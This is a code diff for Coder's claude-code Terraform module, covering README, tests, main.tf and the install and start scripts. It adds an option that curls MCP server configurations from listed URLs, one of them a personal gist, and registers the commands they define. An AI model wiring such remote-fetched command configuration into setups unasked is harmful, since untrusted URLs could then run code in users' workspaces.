-> When a specific `claude_code_version` (other than "latest") is provided, the module will install Claude Code via npm instead of the official installer. This allows for version pinning. The `claude_binary_path` variable can be used to specify where a pre-installed Claude binary is located.
+> The `claude_binary_path` variable can be used to specify where a pre-installed Claude binary is located.
+
+> [!WARNING]
+> **Deprecation Notice**: The npm installation method (`install_via_npm = true`) will be deprecated and removed in the next major release. Please use the default binary installation method instead.
 
 ```tf
 module "claude-code" {
   source   = "registry.coder.com/coder/claude-code/coder"
-  version  = "4.5.0"
+  version  = "4.8.1"
   agent_id = coder_agent.main.id
   workdir  = "/home/coder/project"
 
@@ -122,7 +141,7 @@ module "claude-code" {
   # OR
   claude_code_oauth_token = "xxxxx-xxxx-xxxx"
 
-  claude_code_version = "2.0.62"          # Pin to a specific version (uses npm)
+  claude_code_version = "2.0.62"          # Pin to a specific version
   claude_binary_path  = "/opt/claude/bin" # Path to pre-installed Claude binary
   agentapi_version    = "0.11.4"
 
@@ -139,9 +158,30 @@ module "claude-code" {
     }
   }
   EOF
+
+  mcp_config_remote_path = [
+    "https://gist.githubusercontent.com/35C4n0r/cd8dce70360e5d22a070ae21893caed4/raw/",
+    "https://raw.githubusercontent.com/coder/coder/main/.mcp.json"
+  ]
 }
 ```
 
+> [!NOTE]
+> Remote URLs should return a JSON body in the following format:
+>
+> ```json
+> {
+>   "mcpServers": {
+>     "server-name": {
+>       "command": "some-command",
+>       "args": ["arg1", "arg2"]
+>     }
+>   }
+> }
+> ```
+>
+> The `Content-Type` header doesn't matter—both `text/plain` and `application/json` work fine.
+
 ### Standalone Mode
 
 Run and configure Claude Code as a standalone CLI in your workspace.
@@ -149,7 +189,7 @@ Run and configure Claude Code as a standalone CLI in your workspace.
 ```tf
 module "claude-code" {
   source              = "registry.coder.com/coder/claude-code/coder"
-  version             = "4.5.0"
+  version             = "4.8.1"
   agent_id            = coder_agent.main.id
   workdir             = "/home/coder/project"
   install_claude_code = true
@@ -171,7 +211,7 @@ variable "claude_code_oauth_token" {
 
 module "claude-code" {
   source                  = "registry.coder.com/coder/claude-code/coder"
-  version                 = "4.5.0"
+  version                 = "4.8.1"
   agent_id                = coder_agent.main.id
   workdir                 = "/home/coder/project"
   claude_code_oauth_token = var.claude_code_oauth_token
@@ -182,7 +222,7 @@ module "claude-code" {
 
 #### Prerequisites
 
-AWS account with Bedrock access, Claude models enabled in Bedrock console, appropriate IAM permissions.
+AWS account with Bedrock access, Claude models enabled in Bedrock console, and appropriate IAM permissions.
 
 Configure Claude Code to use AWS Bedrock for accessing Claude models through your AWS infrastructure.
 
@@ -244,7 +284,7 @@ resource "coder_env" "bedrock_api_key" {
 
 module "claude-code" {
   source   = "registry.coder.com/coder/claude-code/coder"
-  version  = "4.5.0"
+  version  = "4.8.1"
   agent_id = coder_agent.main.id
   workdir  = "/home/coder/project"
   model    = "global.anthropic.claude-sonnet-4-5-20250929-v1:0"
@@ -258,7 +298,7 @@ module "claude-code" {
 
 #### Prerequisites
 
-GCP project with Vertex AI API enabled, Claude models enabled through Model Garden, service account with Vertex AI permissions, appropriate IAM permissions (Vertex AI User role).
+GCP project with Vertex AI API enabled, Claude models enabled through Model Garden, service account with Vertex AI permissions, and appropriate IAM permissions (Vertex AI User role).
 
 Configure Claude Code to use Google Vertex AI for accessing Claude models through Google Cloud Platform.
 
@@ -301,7 +341,7 @@ resource "coder_env" "google_application_credentials" {
 
 module "claude-code" {
   source   = "registry.coder.com/coder/claude-code/coder"
-  version  = "4.5.0"
+  version  = "4.8.1"
   agent_id = coder_agent.main.id
   workdir  = "/home/coder/project"
   model    = "claude-sonnet-4@20250514"

registry/coder/modules/claude-code/main.test.ts

@@ -461,4 +461,54 @@ EOF`,
     expect(startLog.stdout).toContain(taskSessionId);
     expect(startLog.stdout).not.toContain("manual-456");
   });
+
+  test("mcp-config-remote-path", async () => {
+    const failingUrl = "http://localhost:19999/mcp.json";
+    const successUrl =
+      "https://raw.githubusercontent.com/coder/coder/main/.mcp.json";
+
+    const { id, coderEnvVars } = await setup({
+      skipClaudeMock: true,
+      moduleVariables: {
+        mcp_config_remote_path: JSON.stringify([failingUrl, successUrl]),
+      },
+    });
+    await execModuleScript(id, coderEnvVars);
+
+    const installLog = await readFileContainer(
+      id,
+      "/home/coder/.claude-module/install.log",
+    );
+
+    // Verify both URLs are attempted
+    expect(installLog).toContain(failingUrl);
+    expect(installLog).toContain(successUrl);
+
+    // First URL should fail gracefully
+    expect(installLog).toContain(
+      `Warning: Failed to fetch MCP configuration from '${failingUrl}'`,
+    );
+
+    // Second URL should succeed - no failure warning for it
+    expect(installLog).not.toContain(
+      `Warning: Failed to fetch MCP configuration from '${successUrl}'`,
+    );
+
+    // Should contain the MCP server add command from successful fetch
+    expect(installLog).toContain(
+      "Added stdio MCP server go-language-server to local config",
+    );
+
+    expect(installLog).toContain(
+      "Added stdio MCP server typescript-language-server to local config",
+    );
+
+    // Verify the MCP config was added to claude.json
+    const claudeConfig = await readFileContainer(
+      id,
+      "/home/coder/.claude.json",
+    );
+    expect(claudeConfig).toContain("typescript-language-server");
+    expect(claudeConfig).toContain("go-language-server");
+  });
 });

registry/coder/modules/claude-code/main.tf

@@ -1,5 +1,5 @@
 terraform {
-  required_version = ">= 1.0"
+  required_version = ">= 1.9"
 
   required_providers {
     coder = {
@@ -67,7 +67,7 @@ variable "cli_app_display_name" {
 
 variable "pre_install_script" {
   type        = string
-  description = "Custom script to run before installing Claude Code."
+  description = "Custom script to run before installing Claude Code. Can be used for dependency ordering between modules (e.g., waiting for git-clone to complete before Claude Code initialization)."
   default     = null
 }
 
@@ -166,6 +166,12 @@ variable "mcp" {
   default     = ""
 }
 
+variable "mcp_config_remote_path" {
+  type        = list(string)
+  description = "List of URLs that return JSON MCP server configurations (text/plain with valid JSON)"
+  default     = []
+}
+
 variable "allowed_tools" {
   type        = string
   description = "A list of tools that should be allowed without prompting the user for permission, in addition to settings.json files."
@@ -202,6 +208,11 @@ variable "claude_binary_path" {
   type        = string
   description = "Directory where the Claude Code binary is located. Use this if Claude is pre-installed or installed outside the module to a non-default location."
   default     = "$HOME/.local/bin"
+
+  validation {
+    condition     = var.claude_binary_path == "$HOME/.local/bin" || !var.install_claude_code
+    error_message = "Custom claude_binary_path can only be used when install_claude_code is false. The official installer always installs to $HOME/.local/bin and does not support custom paths."
+  }
 }
 
 variable "install_via_npm" {
@@ -218,8 +229,8 @@ variable "enable_boundary" {
 
 variable "boundary_version" {
   type        = string
-  description = "Boundary version, valid git reference should be provided (tag, commit, branch)"
-  default     = "main"
+  description = "Boundary version. When use_boundary_directly is true, a release version should be provided or 'latest' for the latest release. When compile_boundary_from_source is true, a valid git reference should be provided (tag, commit, branch)."
+  default     = "latest"
 }
 
 variable "compile_boundary_from_source" {
@@ -228,6 +239,12 @@ variable "compile_boundary_from_source" {
   default     = false
 }
 
+variable "use_boundary_directly" {
+  type        = bool
+  description = "Whether to use boundary binary directly instead of coder boundary subcommand. When false (default), uses coder boundary subcommand. When true, installs and uses boundary binary from release."
+  default     = false
+}
+
 variable "enable_aibridge" {
   type        = bool
   description = "Use AI Bridge for Claude Code. https://coder.com/docs/ai-coder/ai-bridge"
@@ -244,10 +261,10 @@ variable "enable_aibridge" {
   }
 }
 
-variable "cli_command" {
-  type        = string
-  description = "The command to run for the Claude Code CLI app when tasks are disabled."
-  default     = ""
+variable "enable_state_persistence" {
+  type        = bool
+  description = "Enable AgentAPI conversation state persistence across restarts."
+  default     = true
 }
 
 resource "coder_env" "claude_code_md_path" {
@@ -270,9 +287,11 @@ resource "coder_env" "claude_code_oauth_token" {
 }
 
 resource "coder_env" "claude_api_key" {
+  count = local.claude_api_key != "" ? 1 : 0
+
   agent_id = var.agent_id
   name     = "CLAUDE_API_KEY"
-  value    = var.enable_aibridge ? data.coder_workspace_owner.me.session_token : var.claude_api_key
+  value    = local.claude_api_key
 }
 
 resource "coder_env" "disable_autoupdater" {
@@ -282,18 +301,6 @@ resource "coder_env" "disable_autoupdater" {
   value    = "1"
 }
 
-resource "coder_env" "claude_binary_path" {
-  agent_id = var.agent_id
-  name     = "PATH"
-  value    = "${var.claude_binary_path}:$PATH"
-
-  lifecycle {
-    precondition {
-      condition     = var.claude_binary_path == "$HOME/.local/bin" || !var.install_claude_code
-      error_message = "Custom claude_binary_path can only be used when install_claude_code is false. The official installer and npm both install to fixed locations."
-    }
-  }
-}
 
 resource "coder_env" "anthropic_model" {
   count    = var.model != "" ? 1 : 0
@@ -318,7 +325,8 @@ locals {
   start_script    = file("${path.module}/scripts/start.sh")
   module_dir_name = ".claude-module"
   # Extract hostname from access_url for boundary --allow flag
-  coder_host = replace(replace(data.coder_workspace.me.access_url, "https://", ""), "http://", "")
+  coder_host     = replace(replace(data.coder_workspace.me.access_url, "https://", ""), "http://", "")
+  claude_api_key = var.enable_aibridge ? data.coder_workspace_owner.me.session_token : var.claude_api_key
 
   # Required prompts for the module to properly report task status to Coder
   report_tasks_system_prompt = <<-EOT
@@ -350,109 +358,75 @@ locals {
     var.report_tasks ? format("\n%s\n", local.report_tasks_system_prompt) : "",
     local.custom_system_prompt != "" ? format("\n%s\n", local.custom_system_prompt) : ""
   )
+}
 
-  # Common environment variables for install script
-  install_env_vars = <<-EOT
-    export ARG_CLAUDE_CODE_VERSION='${var.claude_code_version}'
-    export ARG_MCP_APP_STATUS_SLUG='${local.app_slug}'
-    export ARG_INSTALL_CLAUDE_CODE='${var.install_claude_code}'
-    export ARG_CLAUDE_BINARY_PATH='${var.claude_binary_path}'
-    export ARG_INSTALL_VIA_NPM='${var.install_via_npm}'
-    export ARG_REPORT_TASKS='${var.report_tasks}'
-    export ARG_WORKDIR='${local.workdir}'
-    export ARG_ALLOWED_TOOLS='${var.allowed_tools}'
-    export ARG_DISALLOWED_TOOLS='${var.disallowed_tools}'
-    export ARG_MCP='${var.mcp != null ? base64encode(replace(var.mcp, "'", "'\\''")) : ""}'
-    export ARG_ENABLE_AIBRIDGE='${var.enable_aibridge}'
-  EOT
+module "agentapi" {
+  source  = "registry.coder.com/coder/agentapi/coder"
+  version = "2.2.0"
 
-  # Common environment variables for start script
-  start_env_vars = <<-EOT
-    export ARG_RESUME_SESSION_ID='${var.resume_session_id}'
-    export ARG_CONTINUE='${var.continue}'
-    export ARG_DANGEROUSLY_SKIP_PERMISSIONS='${var.dangerously_skip_permissions}'
-    export ARG_PERMISSION_MODE='${var.permission_mode}'
-    export ARG_WORKDIR='${local.workdir}'
-    export ARG_AI_PROMPT='${base64encode(var.ai_prompt)}'
-    export ARG_REPORT_TASKS='${var.report_tasks}'
-    export ARG_ENABLE_BOUNDARY='${var.enable_boundary}'
-    export ARG_BOUNDARY_VERSION='${var.boundary_version}'
-    export ARG_COMPILE_FROM_SOURCE='${var.compile_boundary_from_source}'
-    export ARG_CODER_HOST='${local.coder_host}'
-    export ARG_NON_AGENTAPI_CLI='${!var.report_tasks && var.cli_app ? true : false}'
-  EOT
-
-  # Reusable install script command
-  install_command = <<-EOT
-    #!/bin/bash
-    set -o pipefail
-
-    echo -n '${base64encode(local.install_script)}' | base64 -d > /tmp/install.sh
-
-    chmod +x /tmp/install.sh
-    ${local.install_env_vars}
-    /tmp/install.sh
-  EOT
-
-  # Reusable start script command for agentapi module
-  agentapi_start_command = <<-EOT
+  agent_id                 = var.agent_id
+  web_app_slug             = local.app_slug
+  web_app_order            = var.order
+  web_app_group            = var.group
+  web_app_icon             = var.icon
+  web_app_display_name     = var.web_app_display_name
+  folder                   = local.workdir
+  cli_app                  = var.cli_app
+  cli_app_slug             = var.cli_app ? "${local.app_slug}-cli" : null
+  cli_app_display_name     = var.cli_app ? var.cli_app_display_name : null
+  agentapi_subdomain       = var.subdomain
+  module_dir_name          = local.module_dir_name
+  install_agentapi         = var.install_agentapi
+  agentapi_version         = var.agentapi_version
+  enable_state_persistence = var.enable_state_persistence
+  pre_install_script       = var.pre_install_script
+  post_install_script      = var.post_install_script
+  start_script             = <<-EOT
     #!/bin/bash
     set -o errexit
     set -o pipefail
     echo -n '${base64encode(local.start_script)}' | base64 -d > /tmp/start.sh
     chmod +x /tmp/start.sh
 
-    ${local.start_env_vars}
+    ARG_RESUME_SESSION_ID='${var.resume_session_id}' \
+    ARG_CONTINUE='${var.continue}' \
+    ARG_DANGEROUSLY_SKIP_PERMISSIONS='${var.dangerously_skip_permissions}' \
+    ARG_PERMISSION_MODE='${var.permission_mode}' \
+    ARG_WORKDIR='${local.workdir}' \
+    ARG_AI_PROMPT='${base64encode(var.ai_prompt)}' \
+    ARG_REPORT_TASKS='${var.report_tasks}' \
+    ARG_ENABLE_BOUNDARY='${var.enable_boundary}' \
+    ARG_BOUNDARY_VERSION='${var.boundary_version}' \
+    ARG_COMPILE_FROM_SOURCE='${var.compile_boundary_from_source}' \
+    ARG_USE_BOUNDARY_DIRECTLY='${var.use_boundary_directly}' \
+    ARG_CODER_HOST='${local.coder_host}' \
+    ARG_CLAUDE_BINARY_PATH='${var.claude_binary_path}' \
     /tmp/start.sh
   EOT
+
+  install_script = <<-EOT
+    #!/bin/bash
+    set -o errexit
+    set -o pipefail
+
+    echo -n '${base64encode(local.install_script)}' | base64 -d > /tmp/install.sh
+    chmod +x /tmp/install.sh
+    ARG_CLAUDE_CODE_VERSION='${var.claude_code_version}' \
+    ARG_MCP_APP_STATUS_SLUG='${local.app_slug}' \
+    ARG_INSTALL_CLAUDE_CODE='${var.install_claude_code}' \
+    ARG_CLAUDE_BINARY_PATH='${var.claude_binary_path}' \
+    ARG_INSTALL_VIA_NPM='${var.install_via_npm}' \
+    ARG_REPORT_TASKS='${var.report_tasks}' \
+    ARG_WORKDIR='${local.workdir}' \
+    ARG_ALLOWED_TOOLS='${var.allowed_tools}' \
+    ARG_DISALLOWED_TOOLS='${var.disallowed_tools}' \
+    ARG_MCP='${var.mcp != null ? base64encode(replace(var.mcp, "'", "'\\''")) : ""}' \
+    ARG_MCP_CONFIG_REMOTE_PATH='${base64encode(jsonencode(var.mcp_config_remote_path))}' \
+    ARG_ENABLE_AIBRIDGE='${var.enable_aibridge}' \
+    /tmp/install.sh
+  EOT
 }
 
-resource "coder_script" "install_agent" {
-  count = !var.report_tasks ? 1 : 0
-
-  agent_id     = var.agent_id
-  display_name = "Install agent"
-  run_on_start = true
-  log_path     = "/home/coder/install.log"
-  script       = local.install_command
-}
-
-resource "coder_app" "agent_cli" {
-  count = (!var.report_tasks && var.cli_app) ? 1 : 0
-
-  agent_id     = var.agent_id
-  slug         = local.app_slug
-  display_name = var.cli_app_display_name
-
-  command = length(trimprefix(var.cli_command, " ")) > 0 ? var.cli_command : local.agentapi_start_command
-}
-
-
-module "agentapi" {
-  source  = "registry.coder.com/coder/agentapi/coder"
-  version = "2.0.0"
-
-  count                = var.report_tasks ? 1 : 0
-  agent_id             = var.agent_id
-  web_app_slug         = local.app_slug
-  web_app_order        = var.order
-  web_app_group        = var.group
-  web_app_icon         = var.icon
-  web_app_display_name = var.web_app_display_name
-  folder               = local.workdir
-  cli_app              = var.cli_app
-  cli_app_slug         = var.cli_app ? "${local.app_slug}-cli" : null
-  cli_app_display_name = var.cli_app ? var.cli_app_display_name : null
-  agentapi_subdomain   = var.subdomain
-  module_dir_name      = local.module_dir_name
-  install_agentapi     = var.install_agentapi
-  agentapi_version     = var.agentapi_version
-  pre_install_script   = var.pre_install_script
-  post_install_script  = var.post_install_script
-  start_script         = local.agentapi_start_command
-  install_script       = local.install_command
-}
-
 output "task_app_id" {
-  value = try(module.agentapi[0].task_app_id, null)
+  value = module.agentapi.task_app_id
 }

registry/coder/modules/claude-code/main.tftest.hcl

@@ -42,7 +42,7 @@ run "test_claude_code_with_api_key" {
   }
 
   assert {
-    condition     = coder_env.claude_api_key.value == "test-api-key-123"
+    condition     = coder_env.claude_api_key[0].value == "test-api-key-123"
     error_message = "Claude API key value should match the input"
   }
 }
@@ -298,6 +298,13 @@ run "test_aibridge_enabled" {
     enable_aibridge = true
   }
 
+  override_data {
+    target = data.coder_workspace_owner.me
+    values = {
+      session_token = "mock-session-token"
+    }
+  }
+
   assert {
     condition     = var.enable_aibridge == true
     error_message = "AI Bridge should be enabled"
@@ -314,12 +321,12 @@ run "test_aibridge_enabled" {
   }
 
   assert {
-    condition     = coder_env.claude_api_key.name == "CLAUDE_API_KEY"
+    condition     = coder_env.claude_api_key[0].name == "CLAUDE_API_KEY"
     error_message = "CLAUDE_API_KEY environment variable should be set"
   }
 
   assert {
-    condition     = coder_env.claude_api_key.value == data.coder_workspace_owner.me.session_token
+    condition     = coder_env.claude_api_key[0].value == data.coder_workspace_owner.me.session_token
     error_message = "CLAUDE_API_KEY should use workspace owner's session token when aibridge is enabled"
   }
 }
@@ -370,7 +377,7 @@ run "test_aibridge_disabled_with_api_key" {
   }
 
   assert {
-    condition     = coder_env.claude_api_key.value == "test-api-key-xyz"
+    condition     = coder_env.claude_api_key[0].value == "test-api-key-xyz"
     error_message = "CLAUDE_API_KEY should use the provided API key when aibridge is disabled"
   }
 
@@ -379,3 +386,48 @@ run "test_aibridge_disabled_with_api_key" {
     error_message = "ANTHROPIC_BASE_URL should not be set when aibridge is disabled"
   }
 }
+
+run "test_enable_state_persistence_default" {
+  command = plan
+
+  variables {
+    agent_id = "test-agent"
+    workdir  = "/home/coder"
+  }
+
+  assert {
+    condition     = var.enable_state_persistence == true
+    error_message = "enable_state_persistence should default to true"
+  }
+}
+
+run "test_disable_state_persistence" {
+  command = plan
+
+  variables {
+    agent_id                 = "test-agent"
+    workdir                  = "/home/coder"
+    enable_state_persistence = false
+  }
+
+  assert {
+    condition     = var.enable_state_persistence == false
+    error_message = "enable_state_persistence should be false when explicitly disabled"
+  }
+}
+
+
+run "test_no_api_key_no_env" {
+  command = plan
+
+  variables {
+    agent_id        = "test-agent-no-key"
+    workdir         = "/home/coder/test"
+    enable_aibridge = false
+  }
+
+  assert {
+    condition     = length(coder_env.claude_api_key) == 0
+    error_message = "CLAUDE_API_KEY should not be created when no API key is provided and aibridge is disabled"
+  }
+}

registry/coder/modules/claude-code/scripts/install.sh

@@ -12,14 +12,19 @@ ARG_CLAUDE_CODE_VERSION=${ARG_CLAUDE_CODE_VERSION:-}
 ARG_WORKDIR=${ARG_WORKDIR:-"$HOME"}
 ARG_INSTALL_CLAUDE_CODE=${ARG_INSTALL_CLAUDE_CODE:-}
 ARG_CLAUDE_BINARY_PATH=${ARG_CLAUDE_BINARY_PATH:-"$HOME/.local/bin"}
+ARG_CLAUDE_BINARY_PATH="${ARG_CLAUDE_BINARY_PATH/#\~/$HOME}"
+ARG_CLAUDE_BINARY_PATH="${ARG_CLAUDE_BINARY_PATH//\$HOME/$HOME}"
 ARG_INSTALL_VIA_NPM=${ARG_INSTALL_VIA_NPM:-false}
 ARG_REPORT_TASKS=${ARG_REPORT_TASKS:-true}
 ARG_MCP_APP_STATUS_SLUG=${ARG_MCP_APP_STATUS_SLUG:-}
 ARG_MCP=$(echo -n "${ARG_MCP:-}" | base64 -d)
+ARG_MCP_CONFIG_REMOTE_PATH=$(echo -n "${ARG_MCP_CONFIG_REMOTE_PATH:-}" | base64 -d)
 ARG_ALLOWED_TOOLS=${ARG_ALLOWED_TOOLS:-}
 ARG_DISALLOWED_TOOLS=${ARG_DISALLOWED_TOOLS:-}
 ARG_ENABLE_AIBRIDGE=${ARG_ENABLE_AIBRIDGE:-false}
 
+export PATH="$ARG_CLAUDE_BINARY_PATH:$PATH"
+
 echo "--------------------------------"
 
 printf "ARG_CLAUDE_CODE_VERSION: %s\n" "$ARG_CLAUDE_CODE_VERSION"
@@ -30,45 +35,71 @@ printf "ARG_INSTALL_VIA_NPM: %s\n" "$ARG_INSTALL_VIA_NPM"
 printf "ARG_REPORT_TASKS: %s\n" "$ARG_REPORT_TASKS"
 printf "ARG_MCP_APP_STATUS_SLUG: %s\n" "$ARG_MCP_APP_STATUS_SLUG"
 printf "ARG_MCP: %s\n" "$ARG_MCP"
+printf "ARG_MCP_CONFIG_REMOTE_PATH: %s\n" "$ARG_MCP_CONFIG_REMOTE_PATH"
 printf "ARG_ALLOWED_TOOLS: %s\n" "$ARG_ALLOWED_TOOLS"
 printf "ARG_DISALLOWED_TOOLS: %s\n" "$ARG_DISALLOWED_TOOLS"
 printf "ARG_ENABLE_AIBRIDGE: %s\n" "$ARG_ENABLE_AIBRIDGE"
 
 echo "--------------------------------"
 
+function add_mcp_servers() {
+  local mcp_json="$1"
+  local source_desc="$2"
+
+  while IFS= read -r server_name && IFS= read -r server_json; do
+    echo "------------------------"
+    echo "Executing: claude mcp add-json \"$server_name\" '$server_json' ($source_desc)"
+    claude mcp add-json "$server_name" "$server_json" || echo "Warning: Failed to add MCP server '$server_name', continuing..."
+    echo "------------------------"
+    echo ""
+  done < <(echo "$mcp_json" | jq -r '.mcpServers | to_entries[] | .key, (.value | @json)')
+}
+
+function add_path_to_shell_profiles() {
+  local path_dir="$1"
+
+  for profile in "$HOME/.profile" "$HOME/.bash_profile" "$HOME/.bashrc" "$HOME/.zprofile" "$HOME/.zshrc"; do
+    if [ -f "$profile" ]; then
+      if ! grep -q "$path_dir" "$profile" 2> /dev/null; then
+        echo "export PATH=\"\$PATH:$path_dir\"" >> "$profile"
+        echo "Added $path_dir to $profile"
+      fi
+    fi
+  done
+
+  local fish_config="$HOME/.config/fish/config.fish"
+  if [ -f "$fish_config" ]; then
+    if ! grep -q "$path_dir" "$fish_config" 2> /dev/null; then
+      echo "fish_add_path $path_dir" >> "$fish_config"
+      echo "Added $path_dir to $fish_config"
+    fi
+  fi
+}
+
 function ensure_claude_in_path() {
-  if [ -z "${CODER_SCRIPT_BIN_DIR:-}" ]; then
-    echo "CODER_SCRIPT_BIN_DIR not set, skipping PATH setup"
+  local CLAUDE_BIN=""
+  if command -v claude > /dev/null 2>&1; then
+    CLAUDE_BIN=$(command -v claude)
+  elif [ -x "$ARG_CLAUDE_BINARY_PATH/claude" ]; then
+    CLAUDE_BIN="$ARG_CLAUDE_BINARY_PATH/claude"
+  elif [ -x "$HOME/.local/bin/claude" ]; then
+    CLAUDE_BIN="$HOME/.local/bin/claude"
+  fi
+
+  if [ -z "$CLAUDE_BIN" ] || [ ! -x "$CLAUDE_BIN" ]; then
+    echo "Warning: Could not find claude binary"
     return
   fi
 
-  if [ ! -e "$CODER_SCRIPT_BIN_DIR/claude" ]; then
-    local CLAUDE_BIN=""
-    if command -v claude > /dev/null 2>&1; then
-      CLAUDE_BIN=$(command -v claude)
-    elif [ -x "$ARG_CLAUDE_BINARY_PATH/claude" ]; then
-      CLAUDE_BIN="$ARG_CLAUDE_BINARY_PATH/claude"
-    elif [ -x "$HOME/.local/bin/claude" ]; then
-      CLAUDE_BIN="$HOME/.local/bin/claude"
-    fi
+  local CLAUDE_DIR
+  CLAUDE_DIR=$(dirname "$CLAUDE_BIN")
 
-    if [ -n "$CLAUDE_BIN" ] && [ -x "$CLAUDE_BIN" ]; then
-      ln -s "$CLAUDE_BIN" "$CODER_SCRIPT_BIN_DIR/claude"
-      echo "Created symlink: $CODER_SCRIPT_BIN_DIR/claude -> $CLAUDE_BIN"
-    else
-      echo "Warning: Could not find claude binary to symlink"
-    fi
-  else
-    echo "Claude already available in CODER_SCRIPT_BIN_DIR"
+  if [ -n "${CODER_SCRIPT_BIN_DIR:-}" ] && [ ! -e "$CODER_SCRIPT_BIN_DIR/claude" ]; then
+    ln -s "$CLAUDE_BIN" "$CODER_SCRIPT_BIN_DIR/claude"
+    echo "Created symlink: $CODER_SCRIPT_BIN_DIR/claude -> $CLAUDE_BIN"
   fi
 
-  local marker="# Added by claude-code module"
-  for profile in "$HOME/.bashrc" "$HOME/.zshrc" "$HOME/.profile"; do
-    if [ -f "$profile" ] && ! grep -q "$marker" "$profile" 2> /dev/null; then
-      printf "\n%s\nexport PATH=\"%s:\$PATH\"\n" "$marker" "$CODER_SCRIPT_BIN_DIR" >> "$profile"
-      echo "Added $CODER_SCRIPT_BIN_DIR to PATH in $profile"
-    fi
-  done
+  add_path_to_shell_profiles "$CLAUDE_DIR"
 }
 
 function install_claude_code_cli() {
@@ -78,8 +109,9 @@ function install_claude_code_cli() {
     return
   fi
 
-  # Use npm when install_via_npm is true or for specific version pinning
-  if [ "$ARG_INSTALL_VIA_NPM" = "true" ] || { [ -n "$ARG_CLAUDE_CODE_VERSION" ] && [ "$ARG_CLAUDE_CODE_VERSION" != "latest" ]; }; then
+  # Use npm when install_via_npm is true
+  if [ "$ARG_INSTALL_VIA_NPM" = "true" ]; then
+    echo "WARNING: npm installation method will be deprecated and removed in the next major release."
     echo "Installing Claude Code via npm (version: $ARG_CLAUDE_CODE_VERSION)"
     npm install -g "@anthropic-ai/claude-code@$ARG_CLAUDE_CODE_VERSION"
     echo "Installed Claude Code via npm. Version: $(claude --version || echo 'unknown')"
@@ -112,13 +144,25 @@ function setup_claude_configurations() {
   if [ "$ARG_MCP" != "" ]; then
     (
       cd "$ARG_WORKDIR"
-      while IFS= read -r server_name && IFS= read -r server_json; do
-        echo "------------------------"
-        echo "Executing: claude mcp add-json \"$server_name\" '$server_json' (in $ARG_WORKDIR)"
-        claude mcp add-json "$server_name" "$server_json" || echo "Warning: Failed to add MCP server '$server_name', continuing..."
-        echo "------------------------"
-        echo ""
-      done < <(echo "$ARG_MCP" | jq -r '.mcpServers | to_entries[] | .key, (.value | @json)')
+      add_mcp_servers "$ARG_MCP" "in $ARG_WORKDIR"
+    )
+  fi
+
+  if [ -n "$ARG_MCP_CONFIG_REMOTE_PATH" ] && [ "$ARG_MCP_CONFIG_REMOTE_PATH" != "[]" ]; then
+    (
+      cd "$ARG_WORKDIR"
+      for url in $(echo "$ARG_MCP_CONFIG_REMOTE_PATH" | jq -r '.[]'); do
+        echo "Fetching MCP configuration from: $url"
+        mcp_json=$(curl -fsSL "$url") || {
+          echo "Warning: Failed to fetch MCP configuration from '$url', continuing..."
+          continue
+        }
+        if ! echo "$mcp_json" | jq -e '.mcpServers' > /dev/null 2>&1; then
+          echo "Warning: Invalid MCP configuration from '$url' (missing mcpServers), continuing..."
+          continue
+        fi
+        add_mcp_servers "$mcp_json" "from $url"
+      done
     )
   fi
 

registry/coder/modules/claude-code/scripts/start.sh

@@ -2,7 +2,11 @@
 
 set -euo pipefail
 
-true > "$HOME/start.log"
+ARG_CLAUDE_BINARY_PATH=${ARG_CLAUDE_BINARY_PATH:-"$HOME/.local/bin"}
+ARG_CLAUDE_BINARY_PATH="${ARG_CLAUDE_BINARY_PATH/#\~/$HOME}"
+ARG_CLAUDE_BINARY_PATH="${ARG_CLAUDE_BINARY_PATH//\$HOME/$HOME}"
+
+export PATH="$ARG_CLAUDE_BINARY_PATH:$PATH"
 
 command_exists() {
   command -v "$1" > /dev/null 2>&1
@@ -16,44 +20,39 @@ ARG_WORKDIR=${ARG_WORKDIR:-"$HOME"}
 ARG_AI_PROMPT=$(echo -n "${ARG_AI_PROMPT:-}" | base64 -d)
 ARG_REPORT_TASKS=${ARG_REPORT_TASKS:-true}
 ARG_ENABLE_BOUNDARY=${ARG_ENABLE_BOUNDARY:-false}
-ARG_BOUNDARY_VERSION=${ARG_BOUNDARY_VERSION:-"main"}
+ARG_BOUNDARY_VERSION=${ARG_BOUNDARY_VERSION:-"latest"}
 ARG_COMPILE_FROM_SOURCE=${ARG_COMPILE_FROM_SOURCE:-false}
+ARG_USE_BOUNDARY_DIRECTLY=${ARG_USE_BOUNDARY_DIRECTLY:-false}
 ARG_CODER_HOST=${ARG_CODER_HOST:-}
-ARG_NON_AGENTAPI_CLI=${ARG_NON_AGENTAPI_CLI:-false}
 
-log() {
-  if [[ "${ARG_NON_AGENTAPI_CLI}" = "true" ]]; then
-    printf -- "$@" >> "$HOME/start.log"
-  else
-    printf -- "$@"
-  fi
-}
+echo "--------------------------------"
 
-log "ARG_RESUME: %s\n" "$ARG_RESUME_SESSION_ID"
-log "ARG_CONTINUE: %s\n" "$ARG_CONTINUE"
-log "ARG_DANGEROUSLY_SKIP_PERMISSIONS: %s\n" "$ARG_DANGEROUSLY_SKIP_PERMISSIONS"
-log "ARG_PERMISSION_MODE: %s\n" "$ARG_PERMISSION_MODE"
-log "ARG_AI_PROMPT: %s\n" "$ARG_AI_PROMPT"
-log "ARG_WORKDIR: %s\n" "$ARG_WORKDIR"
-log "ARG_REPORT_TASKS: %s\n" "$ARG_REPORT_TASKS"
-log "ARG_ENABLE_BOUNDARY: %s\n" "$ARG_ENABLE_BOUNDARY"
-log "ARG_BOUNDARY_VERSION: %s\n" "$ARG_BOUNDARY_VERSION"
-log "ARG_COMPILE_FROM_SOURCE: %s\n" "$ARG_COMPILE_FROM_SOURCE"
-log "ARG_CODER_HOST: %s\n" "$ARG_CODER_HOST"
+printf "ARG_RESUME: %s\n" "$ARG_RESUME_SESSION_ID"
+printf "ARG_CONTINUE: %s\n" "$ARG_CONTINUE"
+printf "ARG_DANGEROUSLY_SKIP_PERMISSIONS: %s\n" "$ARG_DANGEROUSLY_SKIP_PERMISSIONS"
+printf "ARG_PERMISSION_MODE: %s\n" "$ARG_PERMISSION_MODE"
+printf "ARG_AI_PROMPT: %s\n" "$ARG_AI_PROMPT"
+printf "ARG_WORKDIR: %s\n" "$ARG_WORKDIR"
+printf "ARG_REPORT_TASKS: %s\n" "$ARG_REPORT_TASKS"
+printf "ARG_ENABLE_BOUNDARY: %s\n" "$ARG_ENABLE_BOUNDARY"
+printf "ARG_BOUNDARY_VERSION: %s\n" "$ARG_BOUNDARY_VERSION"
+printf "ARG_COMPILE_FROM_SOURCE: %s\n" "$ARG_COMPILE_FROM_SOURCE"
+printf "ARG_USE_BOUNDARY_DIRECTLY: %s\n" "$ARG_USE_BOUNDARY_DIRECTLY"
